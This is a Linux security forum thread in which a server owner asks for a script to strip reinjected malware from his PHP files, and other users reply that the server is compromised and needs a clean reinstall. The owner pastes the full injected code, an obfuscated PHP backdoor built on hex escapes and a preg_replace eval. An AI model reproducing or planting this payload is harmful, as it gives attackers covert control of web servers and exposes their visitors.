I need help to replace a stupid virus code in all files on server with blank

pvdoffice · 11-06-2015, 07:38 AM

Hello everyone ,

I am contacting you because I have a problem from 2 years.

I have time to time an injection on server who infect almost all of files on my linux server, i don't know how to stopit it, i tryed many times with last versions of antivirus, malware, etc I get tired of it and i wast too much time

So I decided to make a script and put it as cron daily to search in all files and folder in linux and replace the code with blank , this way it can get infected 3 times in a day and it will be auto clean

I don't have code now but it's a quite big encripted code , i guess 2000 characters and have all type of charactes like $ / etc.

example "/$p2rerkfjkaj35"FASFAsfa//fsafaf/fsa"

So I need to replace "/$p2rerkfjkaj35"FASFAsfa//fsafaf/fsa" wich "" ( just blank ) and consider that code it's quite big and have characters like "/" in it

Thank you ,it iwll help me a lot.

Many thanks .

uburundi · 11-06-2015, 08:18 AM

This virus that infects human brains and makes us more stupid, is very dangerous, so you need to have a strong antivirus on your computer which is able to detect those virus, more scanning your computer and having sunglasses to protect your eyes.
thank you.
Nduwimana Gabriel.

onebuck · 11-06-2015, 08:35 AM

Moved: This thread is more suitable in <Linux - Security> and has been moved accordingly to help your thread/question get the exposure it deserves.

Emerson · 11-06-2015, 08:53 AM

You do not "fix" Linux computers with antivirus. Your Linux box either is clean or is infected. Windows-like thinking, oh, I got most of it out does not work and is not acceptable in Linux.

Take the infected machine offline ASAP, only complete re-install will put you back in business. Make sure you harden your server before putting it back online.

Habitual · 11-06-2015, 10:22 AM

The whole mess smacks of incorrect file and directory permissions.
Instead of your "example" how about some actual content of the infection? Say just 100 characters or so.
Do you see any "eval(base64_decode" stuff (or similar) in your php files?
Where in the file are these infections?

Are you certain credentials aren't exploited? (ftp passwords are usually suspect).

Files should be 644 and
directories should be 755.
Few exceptions would be cgi-bin stuff.

Clamscan can detect and identify infected web-content/files.
rkhunter can check for rootkits.

Merely running a cron job to replace infections is locking the barn door after the horses have escaped.

pvdoffice · 11-08-2015, 02:58 PM

Hi Again and thanks for answers.

I tryed many time to put server offline and update all password, check file to file , and it's moving in all domains / subdomains.

So my question is if someone can help me with a comand to replace code ( i will copy + paste here full code ) :

Quote:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $qjcdrjmjap = '#57]38y]47]67y]37]88y]27]28y]#x5c%x782fr%x5c%x782272qj%x5c%x7825)7gc%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg);osvufs}%x5c%x7827 ;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{

gj}l;33bq}kx7825!*##>>X)!gjZ<#opo#>b%x5cc%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7881L1#%x5c%x782f#M5]DgP5]D6#<61]y33]68]y34]68]y33]65]y31]53]y6d:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x%x5c%x7825nfd)##Qtpz)#]35cIjQeTQcOc%x5c%x782f#0fmcnbs+yfeobz+sfwjidsb%x5c%x78x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%1% 154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%156%x75%156%x61"]=1; function fjfgg($n){retb:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!x78256< pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x]D4]275]D:M8]Df#<%x5c%x7876]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bs5)sutcvt)esp>hmg%x5c%x7825!<x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5x5c%x785c%x5c%x7825j:.2^,%x5c%x6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x7x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860m!>!%x5c%x78246767~6<Cw6<pd%x5c%xsbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x782x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH5c%x78257-K)udfoopdX%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5mw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%827u%x5c%x7825)7fmji%x5c%x7 8786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%xx7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x7825b:<!%x5c%x7825c:>%x5c %x7825s:%x5c%x785c%x5c%x7825j%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x782825j,,*!|%x 5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5cx5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]2#%x5c%x7825#%x5c%x782f#o]#%x5c%x74") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%dovg%x5c%x7822)!gj}1~!<2p%x5c%x7t::!>!%x5c%x7824Ypp3)%x5c%x78255}K;%x5c%x7860ufldpt}X;%x5c%x78 60msvd}R;*msv%x5c%x7825)}.;%x5c%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<25w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gjx787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&FHB%x5c%x78 60SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%7825):fmji%x5c%x7878:<##:>:h%*d%x5c%x7827,*c%x 5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x78%x7825)}k~~~<ftmbg!osvufs!|ftmftmbg}%x5c%x787f;!osvufs} w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)=tj{fpg)%x5c%x7825s:*<%QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5ch% x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmx7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:x782400~:<h%x5c%x7825_t%x5c%x7825

svufs:~:<*9-1-r%x5c%x7825)urn chr(ord($n)-1);} @error_reporting(0); preg_repl825)fnbozcYufhA%x5c%x78272qj78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmx5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:x5c%x7825!-#1]#-bubE{h%x5i%x5c%x785c2^<!Ce*[!%x5c%x782f%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]qyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c82f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825c%x787f<u%x5c%x7825V%x5c%x7827x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17rrd%x5c%x782f#00;quui#>.%x5jyf%x5c%x7860439275ttfsqnpd ov{h19275j{hnpd19%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x782%x5c%x78e%x5c%x78b%x5c%x7825w:,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x825) 323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdo6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%24]26%x5c%x7824-%x5c%x7824<%x5c%x75c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x786 0opjudovg)!gj!|!*msv%x5c171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%g%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]2w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x727!hmg%x5c%x7825)!gj!|!*1?hmgx5c%x785c^>Ew: Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x78svd},;uqpuft%x5c%x7860msvd}+;!>!}%xA%x5c%x7822)7gj6<*QDU%x5x782 5j:>>1*!%x5c%x7825)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x4]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]4#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f#cd2bge56+99386c6f+9f5d816:+946:ce44#) zbssb!>!ssbnpe_GMFT%x5c%x7860%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f71^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x0#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x75c%x7878pmpusut)tpqssutRe%x5c%x7 825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*77]y72]265]y39]271]y83]%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82S{ftmfV%x5c%x787f<*XAZASV<*w%12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x75cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785c%x7827;!>>>!}_ ;gvc%x5c%x7825}&;25)!>>%x5c%x7822!ftmbge:56-%x5c%x7878r.985:52985-t.60GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tut&6 |7**111127-K)ebfsX%x5c%x7ace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x6%x78256<%x5c%x787fw6*%x5c%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]4]284]364]6]234]342]58]24]31x5c%x7825j:,,Bjg!)%x5c%f!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x*j%x5c%x7825-#1]#-bubE{x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!E{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjux5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFSx5c%x7825)sutcvt)!gj!|!*bub?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%fm%x5c%x7825:-5ppde:6<.fmjgA%x5c%x7827doj%x5c%x78256<%x560bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fe,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5cpjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78W~%x5c%x7824<%x5c%x78 e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%62%x5f%163%x70%154%x69%164%50%x22%1345c%x7825)tpqsut>j%x5c%x78 x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825c%x7824]y8%x5c%x7824-%x5c%x78c%x7825%x5c%x785cSFWSFT%x5c%x725!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,5cq%x5c%x7825%x5c%x7827 Y%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%xj6<**2qj%x5c%x 7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7x5c%x7822#)fepmqyfA>2b%x%x5c%x7824tvctus)%x5 c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opmqnj!%x5c%x782f!#0#)idubn%x5c%x78 60hfsq)!sp5c%x787f;!opjudovg}k~~9{d%x5c%x7825

svufs:~928>>{ftmfV%x5c%x787f<*X&Z&%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%48y]#>m%x5c%x7825:|:*r%x5c%x78c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]%x5c%x7825o:!>!%x5c%x78242178}527%x5c%x7824-%x5c%x7824*!5z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmc%x7825!<5h%x5c%x7825%x5cgk4%x5c%x7860{6~6<tfs%x5c%x7825:-t%x5c%x7825)3of

pjudovg<~%x5c%x7824<!%x782f#0#%x5c%x782f*#npd%x5c%x782f#)#<%x5c%x7825G]y6d]281Ld]245]K2]2852f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eo%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sut#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R #>q%x5c%x7825V<*>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52975c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x78%62%x35%165%x3a%146%x21%76%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>%x782 7{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5:^<!%x5c%x7825w%x5c%x7860%87f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}256]y78]248]y83]256]y81]265]y72]254]y76]25j>1<%x5c%x7825j=6[%x825tdz)%x5c%x7825bbT-%52]88]5]48]32M3]317]445]212]445]43]321]46%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7ss-%x5c%x7825r%x5c%x7878B%x5c%x7825hx7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,74]256]y39]252]y83]273]y72]2827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%825r%x5c%x7878<~!!%x5c%x7825sNULL) ; }825%x5c%x787f!~!<##!>!2p%c%x787fw6*%x5c%x787f_*#fmj7825w6Z6<.5%x5c%x7860hA%x5c]268]y7f#<!%x5c%x7825tww!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#s254]y76#<%x5c%x7825t82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825b%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W% x5c%825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<x78257**^#zsfvr#%x5c%x7898]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x78if((function_exists("%x6f%142%x5f%163%x74%141%x72%16*w% x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54!*#ojneb#-*f%x5c%x7825)sf%x!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860T51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825275fubmgoj{h1:|:*mmvo:>:iuho%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@# 7#fopoV;hojepdoF.uofuopD#)sfebfI{%x7825%x5c%x7824-%x5c%x78%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%25tdz>#L4]275L3]248L3P6L1M5]D2P4]D6%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UO41]88M4P8]37]278]225]241]33}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-OVMM*<%x22%51%x29%51%x29%73", bs%x5c%x7860un>qp%x5c%x7825!|Z~c%x7825hIr%x5c%x785c5l}S;2-u%x5c%x7825!-#2#%x5c%x782f24!>!fyqmpef)#%x5c%x7824*<!cB%x5c%x7825iN}#-!tussfw)%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5/(.*)/epreg_replacexkvkrbcosg'; $obajszibeq = explode(chr((181-137)),'9018,52,2097,69,592,43,2920,51,5508,44,534,58,4013,63,6320,37,7896,31,2292,57,3691,30,1074,32 ,8619,27,1830,60,8468,63,715,56,2999,66,3287,39,4761,56,5481,27,1503,69,9478,35,1267,66,348,65,1333, 20,4460,24,206,46,5385,59,46,22,6654,70,2971,28,9323,57,4309,36,1449,54,8897,24,5255,46,6545,29,5765 ,47,2386,47,4247,62,6088,36,8593,26,7234,29,2349,37,3829,44,5924,70,6163,48,5552,25,7434,48,983,47,8 105,47,3391,53,2229,63,1030,44,4425,35,5301,33,2619,65,3953,60,2589,30,5672,70,9513,60,3111,24,6357, 25,6506,39,5742,23,2742,47,4130,48,7482,48,8969,49,4345,29,3654,37,855,28,5086,46,5994,27,5861,63,21 66,32,8568,25,7927,54,6021,47,6724,24,8027,52,7209,25,7305,36,3583,27,8401,37,2527,62,7375,59,9899,3 1,1572,52,8678,28,460,30,6124,39,6852,44,9190,27,4912,69,4694,67,2707,35,9608,41,2433,65,490,44,177, 29,8277,45,3772,57,3165,65,6476,30,6611,43,9129,61,1722,54,6896,49,5444,37,3610,44,9295,28,6068,20,6 72,43,6807,45,6211,50,5334,22,4506,60,3444,31,6945,22,5057,29,3540,43,3721,51,7631,65,9380,32,9070,5 9,1987,39,112,65,7861,35,7981,46,9950,33,2064,33,3326,65,7803,58,8438,30,3230,57,8706,20,1403,46,753 0,53,8646,32,2859,61,6574,37,0,46,2789,70,7583,48,2498,29,883,69,7045,60,7015,30,7263,42,7105,33,967 6,50,796,59,1106,50,7138,23,9813,56,6748,59,1156,49,7161,48,1624,50,6446,30,3873,34,1890,50,1353,50, 68,44,9777,36,1940,47,9412,25,9983,27,5577,44,9254,41,2198,31,10010,26,6382,64,3135,30,437,23,4859,5 3,9726,51,8783,55,8358,43,9930,20,4817,42,7765,38,8726,57,8322,36,7696,69,5356,29,8921,48,5004,53,41 78,69,252,28,9437,41,771,25,9573,35,7341,34,4076,54,1674,48,8214,22,1205,62,413,24,9649,27,4566,64,8 236,41,5621,28,4630,64,5195,60,8531,29,314,34,3065,46,2684,23,5649,23,4484,22,635,37,952,31,1776,54, 8079,26,4374,51,8192,22,3907,46,8838,59,9217,37,6261,59,3475,65,5132,63,6967,48,10036,70,2026,38,498 1,23,8152,40,280,34,5812,49,9869,30,8560,8'); $bhzaqzybqi=substr($qjcdrjmjap,(39409-29303),(35-28)); if (!function_exists('ljmngafodr')) { function ljmngafodr($mdwznhkvfo, $oxbyuzuxpq) { $vdtfqhgowm = NULL; for($bjdmkifyek=0;$bjdmkifyek<(sizeof($mdwznhkvfo)/2);$bjdmkifyek++) { $vdtfqhgowm .= substr($oxbyuzuxpq, $mdwznhkvfo[($bjdmkifyek*2)],$mdwznhkvfo[($bjdmkifyek*2)+1]); } return $vdtfqhgowm; };} $voqonupcil="\x20\57\x2a\40\x72\152\x63\147\x6b\166\x68\164\x6c\150\x20\52\x2f\40\x65\166\x61\154\x2 8\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x34\55\x32\60\x37\51\x29 \54\x20\143\x68\162\x28\50\x36\61\x38\55\x35\62\x36\51\x29\54\x20\154\x6a\155\x6e\147\x61\146\x6f\14 4\x72\50\x24\157\x62\141\x6a\163\x7a\151\x62\145\x71\54\x24\161\x6a\143\x64\162\x6a\155\x6a\141\x70\ 51\x29\51\x3b\40\x2f\52\x20\166\x64\142\x66\163\x73\172\x73\164\x6c\40\x2a\57\x20"; $cfynwgtnwu=substr($qjcdrjmjap,(45447-35334),(37-25)); $cfynwgtnwu($bhzaqzybqi, $voqonupcil, NULL); $cfynwgtnwu=$voqonupcil; $cfynwgtnwu=(373-252); $qjcdrjmjap=$cfynwgtnwu-1; ?><?php

with blank, thank you , a script to do it recurvise on all folder . many thanks

astrogeek · 11-08-2015, 03:22 PM

Writing blanks to those files will NOT end the problem.

It is not a virus, you cannot take a pill and feel better tomorrow!

Your server has been compromised.

There will be multiple other entry points that will not be found by such a script
which will allow the intruder to simply rewrite all the php files... again... as you have already seen.

READ THIS AND UNDERSTAND IT:

Quote:

1. Take that system offline immediately - no excuses - do not return
it to service! Every minute that it remains online it continues to deliver SPAM and malware to others!
2. YOU* CANNOT clean up that server with a script or anti-virus program! Forget about it!
The ONLY way to stop this is to reinstall from the ground up from known clean sources.
If you do not have known clean sources then shut it down and start over, keeping frequent known clean
backups this time!

*(Someone with knowledge, time and access might clean it up, but it would not involve copy/paste scripts
or antivirus and would always take much longer and be less reliable than a clean reinstall)

Quote:

I am contacting you because I have a problem from 2 years.

If this has indeed been ongoing for two years, that is your server has been delivering giga-bytes of
SPAM to the internet for two years, you should consider switching to to some other line of business!

unSpawn · 11-09-2015, 01:07 AM

Quote:

Originally Posted by pvdoffice

i tryed many times with last versions of antivirus, malware, etc I get tired of it and i wast too much time (..) So I need to replace

No, replacing text isn't going to solve your problem as it will only give you a false sense of control.

Quote:

Originally Posted by pvdoffice

I have time to time an injection on server who infect almost all of files on my linux server, i don't know how to stopit it,

The fact that you have had these problems for the past two years is telling. If you can't control a situation there's always other resources to get help from ranging from asking at a local LUG to hiring a capable sysadmin to correct things for you and in the right way. And two years also says you most likely haven't made any drastic decisions either to combat this problem. OK. Enough about that.

Indeed you need to reinstall a current version of the OS you use and you really need to properly harden it before you expose it but you particularly need to pay attention to what runs in your web stack because re-installing the OS and then simply restoring any CMS, board or photo gallery software without careful scrutiny will result in failure.

If unsure start by reading up on things and post a more detailed account of 0) your situation like if it's a shared hosting account or a private server, if you have a single user or if it's a multi-tenant setup, 1) what software (names and versions) you run, same for plugins, themes, addons, extensions and other such modifications and 2) a detailed account of the measures you took to combat this problem.